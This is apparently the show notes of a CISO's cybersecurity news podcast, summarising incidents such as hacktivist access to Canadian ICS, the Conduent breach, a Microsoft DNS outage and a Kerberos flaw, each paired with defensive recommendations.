Good Morning Security Gang
Our final show of the week! I don’t do shows on Friday, Saturday, or Sunday because, as a full-time CISO, even I need a few days to catch up, touch grass, and reset. Tomorrow, our full weekly recap will hit your inboxes through our CyberHub newsletter, and Saturday’s deep-dive article — The Cybersecurity Job Market: Layoffs, Offshoring, and the Future of the Workforce — drops exclusively at cyberhubpodcast.com.
Now, today’s show is packed: Canadian critical infrastructure gets hit, Microsoft suffers another global DNS meltdown, Chrome patches 20 new vulnerabilities, and the NSA undergoes a leadership reshuffle. So grab your espresso, Security Gang — coffee cup cheers — and let’s jump right into today’s headlines.
Hacktivists Breach Canada’s Water and Energy Facilities
Canada’s cybersecurity authority is warning that hacktivists accessed and tampered with controls at multiple water, energy, and agricultural facilities, triggering false alarms and creating unsafe operating conditions. The attacks exposed weak authentication and internet-facing ICS and OT assets — a dangerous combination.
“In cyber, we have the CIA triad - confidentiality, integrity, and availability - but you add an S to that and it becomes SCIA, because safety trumps it all in power plants and oil and gas environments. When you think about the business impact of breaches in critical infrastructure, it could create not just an availability issue but a real safety issue where people could die because they would react a specific way to an event that could lead to catastrophic loss of life.” James Azar
If you’re operating critical systems:
Disconnect ICS and HMI assets from the open internet.
Implement network obfuscation instead of relying solely on firewalls.
Restrict vendor remote access and enforce VPN with MFA for administrative sessions.
This is a stark reminder that cyberattacks in operational technology aren’t just about downtime — they can be lethal.
Conduent Data Breach Impacts 10 Million Americans
Government IT contractor Conduent disclosed that a January cyber incident impacted over 10 million individuals across multiple U.S. states, exposing Social Security numbers, medical data, and health insurance information.
The breach affects programs such as Medicaid, food assistance, and tolling systems, underscoring how deeply integrated Conduent’s technology is within state infrastructure. Despite generating $754 million in quarterly revenue, Conduent spent only $2 million on remediation — a drop in the bucket considering the magnitude of the exposure.
Citizens should expect phishing campaigns and benefits fraud, while government partners must demand stronger vendor risk transparency and post-breach validation audits for companies managing public systems.
U.S. Insider Sells Cyber Exploits to Russia
In a chilling insider threat case, Peter Williams, 39, pleaded guilty to stealing and selling U.S. cyber exploits to a Russian broker for $1.3 million in cryptocurrency. The Department of Justice says Williams worked at a cyber tools developer and sold at least eight components of offensive software used for national defense.
Let’s call it what it is — treason. These stolen capabilities can be weaponized against U.S. interests, defense contractors, or even civilians. Insider threats remain one of the hardest challenges to defend against. Strict access governance, data tagging, and behavioral analytics for privileged users are essential to preventing the next Williams from cashing in on national secrets.
Microsoft DNS Outage Hits Azure and 365
For the second time in just over a week, Microsoft suffered a DNS outage impacting Azure, Exchange Admin Center, and 365 portals. The disruption stemmed from a misconfiguration in Azure Front Door’s DNS path, cutting off service access globally.
While Microsoft has implemented a fix, it reignites the debate over cloud vs. on-prem reliability. I’ll say it plainly: moving back on-prem isn’t the solution — resilience is. Redundancy, isolation, and fault-tolerant DNS routing should be foundational.
“Resilience isn’t built in the cloud or on-prem; it’s built in preparation.” James Azar
Still, when both AWS and Azure experience “fat-finger” outages within days of each other, you can’t help but wonder — is it coincidence or coordinated disruption? Either way, resilience planning has never been more critical.
Chrome 142 Patches 20 New Vulnerabilities
Google has released Chrome version 142, addressing 20 security flaws, several of which are high-severity. Chromium-based browsers across Windows, macOS, and Linux are all affected. If you’re managing enterprise endpoints — patch now.
These vulnerabilities, some potentially exploitable for remote code execution, are another reminder that browser updates are part of endpoint defense hygiene. Don’t delay patch rollouts in managed environments — every unpatched browser is a potential gateway.
Botnet Surge Targets PHP and IoT Devices
Security researchers are warning about a surge in automated botnets leveraging old Mirai-style tactics to hijack PHP frameworks and IoT gateways. Attackers are exploiting known CVEs in PHPUnit, Laravel, and ThinkPHP, as well as DVR and camera firmware.
To protect against this wave:
Patch legacy PHP environments immediately.
Rate-limit and geofence admin panels.
Deploy WAF rules and block outbound C2 traffic at the network edge.
This attack style isn’t new — it’s cyber deja vu — but it’s thriving because of unpatched systems and lazy configurations.
Kerberos Reflection Flaw Escalates AD Abuse Risks
Microsoft researchers disclosed a new Kerberos reflection attack chain (CVE-2025-33073) that allows privilege escalation via ghost SPNs and manipulated service principal names. Combined with earlier Kerberos flaws, this chain enables lateral movement, DNS manipulation, and potential domain takeover.
To mitigate, enforce admin workstations with privileged access restrictions, monitor for abnormal SPN creation, and deploy automated privilege auditing tools to identify exposure paths.
MITRE ATT&CK v18 Launches with ICS & Mobile Updates
MITRE has rolled out ATT&CK version 18, expanding detection guidance for mobile and industrial control systems (ICS). New techniques and campaign mappings now integrate directly into SIEM and SOAR frameworks, helping practitioners close visibility gaps in hybrid IT/OT environments.
If you’re running ICS or mobile-heavy operations, updating your threat detection mappings to ATT&CK v18 is a no-brainer — it’s one of the best blue team resources in our industry.
NSA Leadership Shake-Up Amid Dual-Hat Debate
The NSA is undergoing significant leadership changes, with vacancies in top positions including Director and Deputy General Counsel. The shake-up follows the April removal of key generals amid tension over whether to separate NSA from U.S. Cyber Command — the long-debated “dual-hat” model.
Potential successors include Lt. Gen. Paul Stanton, Lt. Gen. Thomas Hensley, and Maj. Gen. William Hartman, all respected cyber leaders. The agency’s need for stability comes at a critical moment — as threats from China, Russia, and North Korea intensify, the NSA’s direction will shape U.S. cyber defense for the decade ahead.
Action List
🔒 Isolate OT networks — remove internet exposure and enforce MFA where possible.
💼 Audit vendor relationships for data handling and breach transparency (Conduent).
🧑💻 Harden insider threat programs — enforce least privilege and behavioral monitoring.
🌐 Patch Chrome 142 and Apache/PHP systems immediately.
☁️ Review cloud redundancy plans — DNS misconfigs should never cripple production.
⚙️ Deploy MITRE ATT&CK v18 mappings into SIEM/SOAR pipelines.
🔑 Audit AD and Kerberos configurations for SPN manipulation or ghost accounts.
🧠 Stay informed — your best defense starts with awareness, not reaction.
James Azar’s CISO’s Take
Today’s stories perfectly capture the intersection of technology, trust, and safety. The Canadian ICS breach is every CISO’s nightmare — a reminder that cybersecurity isn’t just digital; it’s physical, human, and life-impacting. Meanwhile, Microsoft’s DNS chaos and the Chrome patch cycle prove that reliance on automation without redundancy is a risk multiplier, not a time-saver.
My biggest takeaway? Whether it’s critical infrastructure or SaaS, the fundamentals haven’t changed — visibility, segmentation, and resilience are what keep businesses (and people) safe. We can’t automate accountability, and we can’t outsource trust. This week reminded me that security leadership isn’t about chasing every threat — it’s about ensuring every layer of defense serves a purpose.
“Don’t believe everything you see online - everything you see online is just a magnitude, a small micro percentage that’s not even a sample size of what real life is all about. Every now and then, get out, touch grass, enjoy it. The threats will still be there when you get back, but connecting with real people and real life makes us better equipped to face them.” James Azar
Stay caffeinated, stay vigilant, and as always — stay cyber safe.
